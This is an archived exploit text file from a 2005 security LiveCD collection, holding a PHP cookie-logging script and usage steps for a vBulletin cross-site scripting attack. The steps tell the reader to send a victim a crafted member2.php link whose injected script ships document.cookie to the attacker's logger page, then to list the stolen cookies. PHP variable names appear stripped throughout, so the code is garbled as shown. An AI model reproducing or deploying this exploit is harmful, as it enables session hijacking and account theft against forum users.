home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webapp / vbulletin / vBulletinXSS-exp.txt

< prev

Wrap

Text File  |  2005-02-12  |  3KB  |  156 lines

---

1.     - Run this script on some host:
2.  
3.     <?PHP
4.  
5.       // vBulletin XSS Injection Vulnerability: Exploit
6.       // ---
7.       // Coded By  : Sp.IC (SpeedICNet@Hotmail.Com).
8.       // Descrption: Fetching vBulletin's cookies and storing it into a
9. log file.
10.  
11.       // Variables:
12.  
13.        = "Cookies.Log";
14.  
15.       // Functions:
16.  
17.       /*
18.  
19.       If (['Action'] = "Log") {
20.  
21.            = "<!--";
22.            = "--->";
23.  
24.       }
25.       Else {
26.  
27.             = "";
28.             = "";
29.  
30.       }
31.  
32.       Print ();
33.  
34.       */
35.  
36.       Print ("<Title>vBulletin XSS Injection Vulnerability:
37. Exploit</Title>");
38.       Print ("<Pre>");
39.       Print ("<Center>");
40.       Print ("<B>vBulletin XSS Injection Vulnerability: Exploit</B>\n");
41.       Print ("Coded By: <B><A
42. Href=\"MailTo:SpeedICNet@Hotmail.Com\">Sp.IC</A></B><Hr Width=\"20%\">");
43.  
44.       /*
45.  
46.       Print ();
47.  
48.       */
49.  
50.       Switch (['Action']) {
51.  
52.           Case "Log":
53.  
54.                   = ['Cookie'];
55.  
56.                   = StrStr (, SubStr (, BCAdd (0x0D,
57. StrLen (DecHex (MD5 (NULL))))));
58.  
59.                    = FOpen  (, "a+");
60.                          FWrite (, Trim () . "\n");
61.                          FClose ();
62.  
63.                          Print   ("<Meta HTTP-Equiv=\"Refresh\"
64. Content=\"0; URL=" . ['HTTP_REFERER'] . "\">");
65.  
66.           Break;
67.  
68.           Case "List":
69.  
70.                  If (!File_Exists () || !In_Array ()) {
71.  
72.                      Print ("<Br><Br><B>There are No
73. Records</B></Center></Pre>");
74.  
75.                      Exit  ();
76.  
77.                  }
78.                  Else {
79.  
80.                      Print ("</Center></Pre>");
81.  
82.                       = Array_UniQue (File ());
83.  
84.                      Print ("<Pre>");
85.  
86.                      Print ("<B>.:: Statics</B>\n");
87.                      Print ("\n");
88.  
89.                      Print ("^ Logged Records : <B>" . Count (File
90. ()) . "</B>\n");
91.                      Print ("^ Listed Records : <B>" . Count
92.  
93. () . " </B>[Not Counting Duplicates]\n");
94.                      Print ("\n");
95.  
96.                      Print ("<B>.:: Options</B>\n");
97.                      Print ("\n");
98.  
99.                      If (Count (File ()) > 0) {
100.  
101.                          ['Download'] = "[<A Href=\"" .
102.  . "\">Download</A>]";
103.  
104.                      }
105.                      Else{
106.  
107.                          ['Download'] = "[No Records in Log]";
108.  
109.                      }
110.  
111.                      Print ("^ Download Log   : " . 
112. ['Download'] . "\n");
113.                      Print ("^ Clear Records  : [<A Href=\"" .
114.  . "?Action=Delete\">Y</A>]\n");
115.                      Print ("\n");
116.  
117.                      Print ("<B>.:: Records</B>\n");
118.                      Print ("\n");
119.  
120.                      While (List ([0], [1]) = Each ()) {
121.  
122.                          Print ("<B>" . [0] . ": </B>" . [1]);
123.  
124.                      }
125.  
126.                  }
127.  
128.                  Print ("</Pre>");
129.  
130.           Break;
131.  
132.           Case "Delete":
133.  
134.               @UnLink ();
135.  
136.               Print   ("<Br><Br><B>Deleted
137. Succsesfuly</B></Center></Pre>") Or Die ("<Br><Br><B>Error: Cannot Delete
138. Log</B></Center></Pre>");
139.  
140.               Print   ("<Meta HTTP-Equiv=\"Refresh\" Content=\"3; URL=" .
141. ['HTTP_REFERER'] . "\">");
142.  
143.           Break;
144.  
145.       }
146.  
147.     ?>
148.     - Give a victim this link: member2.php?s=[Session]
149. &action=viewsubscription&perpage=[Script Code]
150.  
151.     - Note: You can replace [Script Code] with: --
152. ><Script>location='Http://[Exploit Path]?Action=Log&Cookie='+
153. (document.cookie);</Script>
154.  
155.     - Then go to Http://[Exploit Path]?Action=List
156.